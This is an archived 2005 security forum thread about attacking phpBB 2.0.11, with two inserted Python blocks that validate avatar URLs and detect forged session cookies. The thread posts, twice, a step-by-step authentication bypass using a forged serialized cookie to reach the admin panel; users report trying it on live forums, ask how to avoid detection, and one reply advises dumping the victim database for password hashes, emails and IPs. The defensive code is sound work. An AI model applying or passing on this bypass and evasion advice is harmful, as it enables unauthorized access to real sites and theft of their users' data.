Waraxe IT Security Portal
2.0.11 Arbitrary File Disclosure Vulnerability
Posted: Tue Apr 05, 2005 9:37 pm
kingspice
Beginner
Joined: Apr 05, 2005
Posts: 2

"An attacker can exploit this input validation condition by selecting an avatar from the local machine that meets the board guidelines and can then fill the "Upload Avatar from a URL:" field with the path to an arbitrary file (ex: /etc/passwd). When the avatar is submitted, the destination image of the submitted avatar will contain the contents of the requested file."

I have tried this exploit; however, what files can I download that will provide information that is useful to me?
I can download /etc/passwd, but I need /etc/shadow to get the passwords, which the server doesn't allow access to.

Also, are there any better exploits for version 2.0.11?

Kingspice
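
The advisory quoted in the post above describes an "Upload Avatar from a URL" field that accepts a local path and copies the file's contents into the avatar. As an added example (not code from the post, and not phpBB's own code), here is the input-side check a maintainer would want in front of such a feature: only an absolute http(s) URL with a host is ever handed to the fetch routine, so a bare path like /etc/passwd, a file: or php: URL, or a drive-letter path is refused before anything is opened. The `fetcher` callable, the `triage` helper and the sample values are constructed for the example.

```python
from urllib.parse import urlsplit

# Schemes an "avatar from a URL" feature should ever be allowed to fetch.
# Anything else (no scheme, file:, php:, ftp:, drive letters) is rejected
# before the value reaches any file-opening or URL-fetching routine.
ALLOWED_SCHEMES = {"http", "https"}


def validate_avatar_url(url):
    """Return (ok, reason). ok is True only for an absolute http(s) URL with a host."""
    if not isinstance(url, str) or not url.strip():
        return False, "empty value"
    parts = urlsplit(url.strip())
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        # A bare path such as /etc/passwd has no scheme at all; a Windows
        # path such as C:\boot.ini parses as scheme "c". Both land here.
        return False, f"scheme {scheme!r} not allowed"
    if not parts.hostname:
        return False, "missing host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials embedded in URL"
    return True, "ok"


def fetch_avatar(url, fetcher):
    """Validate first, then hand the URL to `fetcher` (an HTTP client the
    caller supplies; hypothetical here). The point is that no code path
    exists in which the user-controlled value is opened as a local file."""
    ok, reason = validate_avatar_url(url)
    if not ok:
        raise ValueError("rejected avatar URL: " + reason)
    return fetcher(url)


def triage(candidates):
    """Classify a list of submitted values; returns {value: (ok, reason)}."""
    return {value: validate_avatar_url(value) for value in candidates}


if __name__ == "__main__":
    # Constructed sample inputs: one legitimate remote image and the kinds
    # of values the advisory describes being submitted in the URL field.
    samples = [
        "http://images.example.com/avatars/me.gif",
        "/etc/passwd",
        "file:///etc/passwd",
        "C:\\boot.ini",
        "http://user:pw@example.com/a.png",
        "",
    ]
    for value, (ok, reason) in triage(samples).items():
        print(f"{value!r:45} {'ACCEPT' if ok else 'REJECT'} ({reason})")
```

The check deliberately allowlists rather than blocklists: the list of things that are not a remote image is open-ended, while the list of things that are is two schemes plus a host.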
Posted: Wed Apr 06, 2005 6:40 am
y3dips
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia

You could use the Session Handling Authentication Bypass;
read about it in this forum too.

_________________
IO::y3dips->new(http://clog.ammar.web.id);
Posted: Wed Apr 06, 2005 12:55 pm
shai-tan
Valuable expert
Joined: Feb 22, 2005
Posts: 477

Yeah, just use the 2.0.12 exploit. That'll work for 2.0.11:

phpBB 2.0.12 Session Handling Authentication Bypass

Easy to use exploit.

** YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM.

1- Simply VISIT the forum using Mozilla Firefox, and be sure that the cookie is made.

2- Close the browser.

3- Open the cookies.txt (located in "C:\Documents and Settings\ALI\Application Data\Mozilla\Firefox\Profiles\ur4nn6o5.default" when using WinXP, for example)

and you will find something like:

127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D

where 127.0.0.1 is the domain for the forum (tested on localhost)
and a%3A0%3A%7B%7D is the cookie data (as a visitor).

4- OK, let's do it! Now open cookies.txt with your text editor and replace

127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D

with

127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

Save the cookies.txt.

5- Open your browser and go to the exploited forum.
>> Enjoy Hi Permission mode!

Complete the mission by clicking "Go to Administration Panel".

--------------------------------------------------------------------------------

written by: Ali7
e-mail: ali7@hotmail.co.uk

_________________
Shai-tan

“In short: just say NO TO DRUGS, and maybe you won’t end up like the Hurd people.” -- Linus Torvalds
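
The cookie value in the post above is a URL-encoded PHP serialized array in which autologinid is the PHP boolean true (b:1) rather than a string key, which is the value a loosely typed server-side comparison accepts as a match. As an added example, not code from the post, from Ali7 or from phpBB, here is the defender's side of that: a parser for the cookie's serialization format, a classifier that flags a non-string autologinid as tampering, a strict constant-time comparison that refuses a non-string value outright, and a scanner that runs the classifier over cookies.txt-style lines. The sample file reuses the two values shown in the thread; the third line (a member with a string key) is constructed.

```python
import hmac
from urllib.parse import unquote


def php_unserialize(data):
    """Parse the PHP serialize() subset phpBB 2 stores in its *_data session
    cookie: arrays (a), strings (s), booleans (b), integers (i).
    Raises ValueError on malformed input."""
    pos = 0

    def parse():
        nonlocal pos
        tag = data[pos]
        if data[pos + 1] != ":":
            raise ValueError("expected ':' after tag %r" % tag)
        if tag in ("b", "i"):                       # b:1;  i:42;
            end = data.index(";", pos)
            raw, pos = data[pos + 2:end], end + 1
            if tag == "i":
                return int(raw)
            if raw not in ("0", "1"):
                raise ValueError("bad bool")
            return raw == "1"
        if tag == "s":                              # s:6:"userid";
            colon = data.index(":", pos + 2)
            length, start = int(data[pos + 2:colon]), colon + 2
            if data[colon + 1] != '"' or data[start + length:start + length + 2] != '";':
                raise ValueError("bad string")
            pos = start + length + 2
            return data[start:start + length]
        if tag == "a":                              # a:2:{ key value key value }
            colon = data.index(":", pos + 2)
            count = int(data[pos + 2:colon])
            if data[colon + 1] != "{":
                raise ValueError("bad array")
            pos, result = colon + 2, {}
            for _ in range(count):
                key = parse()
                result[key] = parse()
            if data[pos] != "}":
                raise ValueError("unterminated array")
            pos += 1
            return result
        raise ValueError("unsupported tag %r" % tag)

    value = parse()
    if pos != len(data):
        raise ValueError("trailing data")
    return value


def classify_session_cookie(raw_value):
    """Verdict for one URL-encoded *_data cookie value."""
    try:
        session = php_unserialize(unquote(raw_value))
    except (ValueError, IndexError):
        return "malformed"
    if not isinstance(session, dict):
        return "malformed"
    if not session:
        return "guest"
    auto = session.get("autologinid")
    if auto is not None and not isinstance(auto, str):
        # Real autologin keys are strings; a boolean here is the tampering
        # pattern shown in the thread (b:1 inside the cookie).
        return "tampered: autologinid is not a string"
    return "member"


def autologin_key_matches(cookie_autologinid, stored_key):
    """Strict server-side check: both values must be strings, the stored key
    must be non-empty, and the comparison is constant-time byte equality."""
    if not isinstance(cookie_autologinid, str) or not isinstance(stored_key, str):
        return False
    if not stored_key:
        return False
    return hmac.compare_digest(cookie_autologinid.encode(), stored_key.encode())


def scan_cookie_file(text):
    """Classify every *_data cookie in Netscape-format cookies.txt text
    (fields: domain, flag, path, secure, expiry, name, value)."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) != 7 or not fields[5].endswith("_data"):
            continue
        findings.append((fields[0], fields[5], classify_session_cookie(fields[6])))
    return findings


# Constructed sample: the two values shown in the thread plus an ordinary
# member cookie whose autologin key is a (made-up) string.
SAMPLE_COOKIES_TXT = """# HTTP Cookie File
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
forum.example FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A4%3A%22k3y0%22%3Bs%3A6%3A%22userid%22%3Bs%3A2%3A%2242%22%3B%7D
"""
```

Running `scan_cookie_file(SAMPLE_COOKIES_TXT)` returns one verdict per *_data line: guest, tampered, member. On the server side the type check in `autologin_key_matches` is the fix that matters; the classifier is the same rule turned into a detection you can run over captured cookie values or request logs.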
Posted: Thu May 12, 2005 1:52 am
cas
Beginner
Joined: May 12, 2005
Posts: 2

I can't get this exploit working on a 2.0.11 forum ;(

This is my cookies.txt before editing:

Quote:
# HTTP Cookie File
# http://www.netscape.com/newsref/std/cookie_spec.html
# This is a generated file! Do not edit.
# To delete cookies, use the Cookie Manager.

publishers.clickbooth.com FALSE / FALSE 1115970477 directtrack_rotation_integraclick 3
publishers.clickbooth.com FALSE / FALSE 1115948877 universal_adpool_cookie2_1122_24_13060 %2C3%7C1%7C1115862596
getaforum.com FALSE / FALSE 1147398471 phpbb_russ05_data a%3A0%3A%7B%7D
getaforum.com FALSE /phpbb2/ FALSE 1147398471 ForumSetCookie russ05

and this is what it looks like after the edit:

Quote:
# HTTP Cookie File
# http://www.netscape.com/newsref/std/cookie_spec.html
# This is a generated file! Do not edit.
# To delete cookies, use the Cookie Manager.

publishers.clickbooth.com FALSE / FALSE 1115970477 directtrack_rotation_integraclick 3
publishers.clickbooth.com FALSE / FALSE 1115948877 universal_adpool_cookie2_1122_24_13060 %2C3%7C1%7C1115862596
getaforum.com FALSE / FALSE 1147398471 phpbb_russ05_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
getaforum.com FALSE /phpbb2/ FALSE 1147398471 ForumSetCookie russ05

I've also tried replacing the "userid" and "autologinid" with usernames from the forum, without any changes when I reopen the browser.

Using Firefox 1.0.3
Posted: Thu May 12, 2005 6:27 am
devn00b
Regular user
Joined: Feb 20, 2005
Posts: 22

They could have manually patched the forums. It's a simple fix really. My forums still show as .8 but are updated with all the current fixes.
Posted: Thu May 12, 2005 11:32 pm
cas
Beginner
Joined: May 12, 2005
Posts: 2

Any way to find the real version number?

If anyone wants to give it a try, here's the URL:

[removed]
Posted: Fri May 13, 2005 12:48 am
shai-tan
Valuable expert
Joined: Feb 22, 2005
Posts: 477

Sorry :P but rules 1 and 1a clearly say:
Quote:
1) No Posting of IP Addresses or Vulnerable WebSites in the forum

1a) When posting an IP address of a machine when discussing an issue should be done as follows. Xxx.xxx.xxx.xxx

If you wish to get someone to help you: email or PM someone and ask them if they could. Then send them the URL if they answer yes.

For all those who have not read the rules, I suggest you read them.
http://www.waraxe.us/ftopict-57.html

Thanks
Shai-tan

_________________
Shai-tan

“In short: just say NO TO DRUGS, and maybe you won’t end up like the Hurd people.” -- Linus Torvalds
Posted: Thu Oct 13, 2005 4:05 pm
Michael_Brad
Regular user
Joined: Oct 13, 2005
Posts: 5

Hey,

I've been searching for resources on "hacking phpBB" for a loooong time. Good to know that I finally found the method... indeed it is simple.

Right, I want to thank you guys for the help on that; however... if you could help me a little bit over here I would appreciate it!

Right, so I have tried editing my cookies and saving them at a few phpBB message boards... but none of them worked. I eventually found out that the reason why it would not work is because my cookies weren't "edited" properly. When I would "replace the text" and went File > Save, the "changes" would not be saved.

Yeah I know, you probably just figured I know nothing about computers... lol. Well I do know a fair bit, but this one I don't know. So if anyone could help me a bit here as to how to "save" the changes I have made to my cookies, it would be greatly appreciated.

PS Sorry I had to bring this topic back from the dead...
Posted: Thu Oct 13, 2005 11:48 pm
y3dips
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia

See the permissions of the file; do you have the rights to write to the file?
Or make yourself someone who has the rights, such as administrator in Windows or root in *nix.

_________________
IO::y3dips->new(http://clog.ammar.web.id);
Posted: Fri Oct 14, 2005 5:42 pm
Michael_Brad
Regular user
Joined: Oct 13, 2005
Posts: 5

Bleh, just ignore me. I figured it all out now... AND made it work!

Question, btw... if I simply have a look at the admin panel, but I do NOT make any changes, then I will not be caught. Is that correct? Cheers
Posted: Sat Oct 15, 2005 11:03 am
shai-tan
Valuable expert
Joined: Feb 22, 2005
Posts: 477

This really depends on how many admins there are and what addons they have on the board. Because if they are in the admin panel at the same time and see one of the other admins logged on under a different-to-usual IP, then... if they have a 3rd party admin or IP logger addon, they may catch you that way. Otherwise I would just back up their database and get more md5s and email addys and IPs and websites and anything else. Also view what's in the admin forum for the hell of it.

_________________
Shai-tan

“In short: just say NO TO DRUGS, and maybe you won’t end up like the Hurd people.” -- Linus Torvalds
Posted: Sat Oct 15, 2005 3:58 pm
Michael_Brad
Regular user
Joined: Oct 13, 2005
Posts: 5

Cheers for the info... Yeah, I will not be using this when an admin is already browsing the boards. Now all I need to do is wait for the exploit for version 2.0.18 of phpBB to be released.

Someone told me, btw, that he was able to hack a phpBB forum even if it was patched. Makes me wonder how that is possible, but cheers for the responses anyhow.
Posted: Wed Mar 08, 2006 10:04 am
Musaaf
Beginner
Joined: Mar 08, 2006
Posts: 3

shai-tan wrote:
Yeah, just use the 2.0.12 exploit. That'll work for 2.0.11:

phpBB 2.0.12 Session Handling Authentication Bypass

Easy to use exploit.

** YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM.

1- Simply VISIT the forum using Mozilla Firefox, and be sure that the cookie is made.

2- Close the browser.

3- Open the cookies.txt (located in "C:\Documents and Settings\ALI\Application Data\Mozilla\Firefox\Profiles\ur4nn6o5.default" when using WinXP, for example)

and you will find something like:

127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D

where 127.0.0.1 is the domain for the forum (tested on localhost)
and a%3A0%3A%7B%7D is the cookie data (as a visitor).

4- OK, let's do it! Now open cookies.txt with your text editor and replace

127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D

with

127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

Save the cookies.txt.

5- Open your browser and go to the exploited forum.
>> Enjoy Hi Permission mode!

Complete the mission by clicking "Go to Administration Panel".

--------------------------------------------------------------------------------

written by: Ali7
e-mail: ali7@hotmail.co.uk


I have tried this on a site but it did not work; maybe it's the latest phpBB?

Are there any exploits for the new version?